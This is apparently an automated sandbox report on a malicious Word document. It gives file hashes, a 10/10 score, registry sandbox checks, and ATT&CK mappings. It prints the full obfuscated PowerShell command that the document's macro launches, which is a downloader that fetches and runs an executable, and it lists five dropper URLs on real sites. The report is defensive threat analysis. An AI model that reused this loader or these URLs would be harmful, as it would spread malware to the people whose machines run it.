44dd32692d0e613a75553fa9bf43a0b9c16e9469c64c7a4e4d8bdfd003772746

General

Target

88ed173a8d99d149c094ece725ca4971_JaffaCakes118.doc
Size

118KB
MD5

88ed173a8d99d149c094ece725ca4971
SHA1

2d7c8d947010f530eccb8a883c80a5f4986de57a
SHA256

44dd32692d0e613a75553fa9bf43a0b9c16e9469c64c7a4e4d8bdfd003772746
SHA512

46ea360ce809d5a29b8d4303cdc0d504889a1996017bfa55cce4de16bb82525bac0e5c4f133bf68ae5b1382b4cf75fec62a3727d1294f296957e01e35b2aa91c
SSDEEP

1536:HW3KKCeLbBj1YW+agz6FCJJD76gWYXeVal7d+v:2ieLNM6FI97IJ

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://trostel.eu/G0r8KdEtHu/

exe.dropper

http://thecentralbaptist.com/pMI9u5l/

exe.dropper

http://houselight.com.br/6ROEQfpdJJ/

exe.dropper

http://rusys.lt/thbcIeIjA/

exe.dropper

http://bunt.com/openx/www/spqRlLMl/

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3496	1444	PowersHeLL.exe	83

Blocklisted process makes network request 7 IoCs

flow	pid	Process
24	3496	PowersHeLL.exe
31	3496	PowersHeLL.exe
33	3496	PowersHeLL.exe
36	3496	PowersHeLL.exe
37	3496	PowersHeLL.exe
38	3496	PowersHeLL.exe
42	3496	PowersHeLL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
1444	WINWORD.EXE
1444	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3496	PowersHeLL.exe
3496	PowersHeLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3496	PowersHeLL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
1444	WINWORD.EXE
1444	WINWORD.EXE
1444	WINWORD.EXE
1444	WINWORD.EXE
1444	WINWORD.EXE
1444	WINWORD.EXE
1444	WINWORD.EXE

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1444 wrote to memory of 3496	1444	WINWORD.EXE	90
PID 1444 wrote to memory of 3496	1444	WINWORD.EXE	90

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\88ed173a8d99d149c094ece725ca4971_JaffaCakes118.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1444
- C:\Windows\System32\WindowsPowerShell\v1.0\PowersHeLL.exe
  PowersHeLL . ( $EnV:ComSPEc[4,15,25]-JoiN'') ( -JOIN ((46 , 80 , 90 ,105 , 107, 73,42, 55,42 , 100, 111,125, 39, 101,104, 96, 111, 105, 126,42 , 120 ,107,100 , 110, 101, 103, 49,46 , 92 ,72,93 ,95, 90 ,105 ,42 , 55, 42, 100 ,111 ,125,39 , 101, 104 ,96 ,111,105 ,126 ,42 , 89, 115 , 121 , 126,111, 103 , 36, 68,111 ,126 , 36 ,93, 111 , 104,73 ,102,99 ,111 , 100,126 ,49 , 46,102 ,103, 65, 94 , 95,42, 55 ,42 , 45 , 98,126 ,126,122 , 121,48, 37 , 37, 126,120,101 , 121, 126, 111,102, 36 ,111 ,127 ,37 ,77, 58 ,120, 50, 65 ,110 ,79,126, 66 ,127 , 37 ,74 ,98, 126, 126 , 122,48 , 37, 37, 126,98 , 111 , 105, 111,100,126,120, 107,102 , 104,107, 122,126,99 ,121 ,126 ,36, 105 , 101 ,103 ,37 , 122,71 ,67 , 51 ,127,63, 102, 37 ,74 ,98,126 ,126,122, 48 , 37 , 37 , 98, 101 ,127, 121, 111 , 102,99, 109, 98,126 ,36 , 105,101,103,36 , 104, 120, 37 ,60 ,88,69 ,79,91,108 ,122, 110 , 64,64,37 , 74, 98 , 126, 126 ,122,48, 37,37 ,120 , 127,121 , 115,121, 36 ,102, 126 , 37 , 126, 98,104,105 , 67,111,67, 96, 75, 37,74, 98 , 126,126,122 , 48 ,37,37,104 ,127 , 100 ,126 ,36, 105,101, 103,37, 101, 122,111,100,114 , 37,125, 125,125,37 , 121,122, 123 ,88, 102 ,70,71 , 102 ,37,45 , 36 , 89 ,122 ,102, 99,126 , 34 , 45,74, 45, 35 ,49,46 , 123 , 79 ,70 ,95 , 89,72 , 42, 55,42, 46,80,90, 105 ,107,73 , 36 ,100 , 111 , 114,126, 34,59, 38,42 , 60, 57,58 , 57 , 56, 63, 35,49,46 , 107 ,100,78,96 ,91, 110 ,42,55 , 42, 46, 111 ,100 , 124 ,48 , 126,111,103,122,42, 33, 42 , 45,86,45 ,42 , 33,42, 46 ,123 , 79, 70,95 ,89,72, 42, 33 , 42,45 ,36, 111,114 , 111, 45 , 49,108,101,120,111 ,107, 105, 98,34 ,46 ,95,123 ,66, 93, 75, 42 , 99, 100 , 42, 46, 102 , 103 ,65 ,94 ,95 , 35,113, 126 , 120,115,113,46, 92,72 ,93 , 95, 90 , 105,36, 78,101 ,125 ,100,102 ,101 ,107 ,110,76, 99 ,102 , 111 , 34, 46, 95,123, 66, 93, 75 , 36 ,94 ,101 , 89 , 126 , 120, 99,100,109 , 34 ,35 ,38 , 42 , 46, 107,100 ,78,96,91 , 110 ,35 , 49 ,89 , 126 ,107 , 120, 126,39, 90,120 , 101,105, 111 , 121 , 121,42,46 ,107 , 100,78,96 , 91 , 110, 49,104,120, 111,107 ,97 ,49 , 119 ,105,107 , 126 , 105 ,98, 113,125 , 120 ,99, 126 , 111 ,39, 98, 101 , 121,126,42, 46,85 ,36 , 79 , 114 , 105,111 ,122,126,99,101, 100 ,36, 71 ,111,121, 121,107,109,111 ,49 ,119 ,119 ) |% { [chAr]( $_-bXoR"0x0a")} ))
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\276139.exe

Filesize
1KB

MD5
3c4ceb697e5059e604573d753a2040cc

SHA1
94e13fad2b9f4cfd0db8590f7dc08c8165449948

SHA256
b620f9331191c29b2d38539a89386f9285643569876483db4d596d08423b189d

SHA512
a7394328fbdfb94c980ecc319fd5750c76323421c8475bceb10f954179c64602381bb79beae3a876d5d3219fa54d213b042a43bd10cc45d9568324d6c337fde0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TCDB62A.tmp\gb.xsl

Filesize
262KB

MD5
51d32ee5bc7ab811041f799652d26e04

SHA1
412193006aa3ef19e0a57e16acf86b830993024a

SHA256
6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

SHA512
5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wqovgk2b.ibm.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1444-40-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-7-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-0-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-6-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-46-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-10-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-11-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-47-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-8-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-41-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-14-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-13-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-15-0x00007FFD395C0000-0x00007FFD395D0000-memory.dmp

Filesize
64KB

Download
memory/1444-16-0x00007FFD395C0000-0x00007FFD395D0000-memory.dmp

Filesize
64KB

Download
memory/1444-34-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-2-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-9-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-4-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-12-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-42-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-586-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-5-0x00007FFD7BC0D000-0x00007FFD7BC0E000-memory.dmp

Filesize
4KB

Download
memory/1444-585-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-1-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-584-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-3-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-500-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-561-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-562-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/1444-583-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/1444-582-0x00007FFD3BBF0000-0x00007FFD3BC00000-memory.dmp

Filesize
64KB

Download
memory/3496-77-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download
memory/3496-61-0x0000020319890000-0x00000203198B2000-memory.dmp

Filesize
136KB

Download
memory/3496-51-0x00007FFD7BB70000-0x00007FFD7BD65000-memory.dmp

Filesize
2.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads